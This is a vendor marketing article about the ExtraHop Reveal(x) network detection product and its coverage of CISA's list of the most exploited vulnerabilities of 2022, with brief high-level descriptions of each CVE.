As the ExtraHop product management team prepared for a user group meeting in Minneapolis in early September, team members wanted to show attendees a scorecard highlighting the value of the Reveal(x) NDR platform.
They found the perfect measurement tool. Weeks earlier, the U.S. Cybersecurity and Infrastructure Security Agency (CISA) released the list of the 12 most routinely exploited vulnerabilities during 2022, and the team found that the core NDR functionality in Reveal(x) detects nine of those 12 common exploits, including ProxyShell and Log4Shell.
Including the Reveal(x) IDS module, released earlier this year, the number of detections jumps to 11 of 12.
It’s no accident that Reveal(x) offers detections for 11 of the 12 most routinely exploited vulnerabilities from 2022. First, Reveal(x) ingests network traffic and uses machine learning to detect malicious activity and understand security risks and exposure. It combines detection for known attack behavior with the ability to understand what is normal for any given organization, flagging unusual shifts that can indicate an attack. When threat actors use the network to move laterally within a victim’s environment, Reveal(x) detects that movement and alerts users to potential security incidents.
Secondly, the ExtraHop team prioritizes new detectors based on the top vulnerabilities, exploits, tools, and attack techniques they observe, and takes into consideration requests from customers and potential customers. Breadth of coverage for network-addressable attack techniques is also a major goal, says Eric Hayden, an ExtraHop product manager.
The match of detectors to the CISA list “highlights that our internal prioritization process works,” Hayden adds. “The team considers a variety of factors to determine what we should build a detector for. We understand the threat landscape, and we build detectors that are going to have the most impact and provide the most value to our customers.”
In addition to human-led creation of detections, ExtraHop also uses machine learning techniques to identify anomalous behavior and generate new detections. This combination of detection-creation techniques gives Reveal(x) wide coverage of the MITRE ATT&CK framework.
ExtraHop customers can use Reveal(x) to identify whether any of these vulnerabilities exist in their environment. Because these vulnerabilities are commonly exploited by threat actors, security teams will likely want to prioritize them for patching to shrink their attack surface and reduce their risk exposure. These detection capabilities are also useful reporting tools for boards of directors: they allow CISOs to demonstrate that their security teams are able to proactively identify and remediate known and highly exploited vulnerabilities.
Reveal(x) detections provide east-west traffic visibility, and the NDR tool offers traffic decryption functionality that other vulnerability scanning software may not include, providing additional context to security teams during investigation and response
Top CVEs detected by Reveal(x) NDR
- CVE-2021-34473 and CVE-2021-34523: These vulnerabilities, used in the ProxyShell family of attacks, affect Microsoft Exchange email servers. Successful exploitation enables a remote actor to execute arbitrary code. The vulnerabilities reside within the Microsoft Client Access Service (CAS), which is commonly exposed to the internet to enable users to access their email through mobile devices and web browsers.
- CVE-2021- 44228: This vulnerability, known as Log4Shell, impacts Apache’s Log4j library, an open-source logging framework incorporated into thousands of products. An attacker can exploit this vulnerability by submitting a specially crafted request to a vulnerable system, causing the execution of arbitrary code. The request allows the attacker to take full control of a system.
- CVE-2018-13379: This vulnerability, affecting Fortinet SSL VPNs, was also routinely exploited in 2020 and 2021. The continuing exploitation suggests that many organizations have failed to patch the software, according to CISA.
- CVE-2021-26084: This vulnerability, affecting web-based collaboration tool Atlassian Confluence Server and Data Center, could enable an unauthenticated threat actor to execute arbitrary code on vulnerable systems. This vulnerability quickly became one of the most routinely exploited vulnerabilities after a proof of concept was released within a week of its disclosure.
- CVE-2022-26134: This critical remote code execution vulnerability also affects Atlassian Confluence and Data Center. The vulnerability, which was likely exploited as a zero-day before public disclosure in June 2022, is related to an older Confluence vulnerability, CISA said.
- CVE-2022-1388: This vulnerability allows unauthenticated malicious cyber actors to bypass iControl REST authentication on F5 BIG-IP application delivery and security software.
- CVE-2022-30190: This vulnerability impacts the Microsoft Support Diagnostic Tool (MSDT) in Windows. A remote, unauthenticated cyber actor could exploit this vulnerability to take control of an affected system.
- CVE-2022-22954: This vulnerability allows remote code execution, privilege escalation, and authentication bypass in VMware Workspace ONE Access, Identity Manager, and other VMware products. A malicious cyber actor with network access could trigger a server-side template injection that may result in remote code execution.
Vulnerabilities detected by Reveal(x) IDS
- CVE-2021-40539. This vulnerability enables unauthenticated remote code execution in Zoho ManageEngine ADSelfService Plus and was linked to the usage of an outdated third-party dependency. Initial exploitation of this vulnerability began in late 2021 and continued throughout 2022.
- CVE-2021-31207: This is another vulnerability in the ProxyShell family of attacks affecting Microsoft Exchange email servers.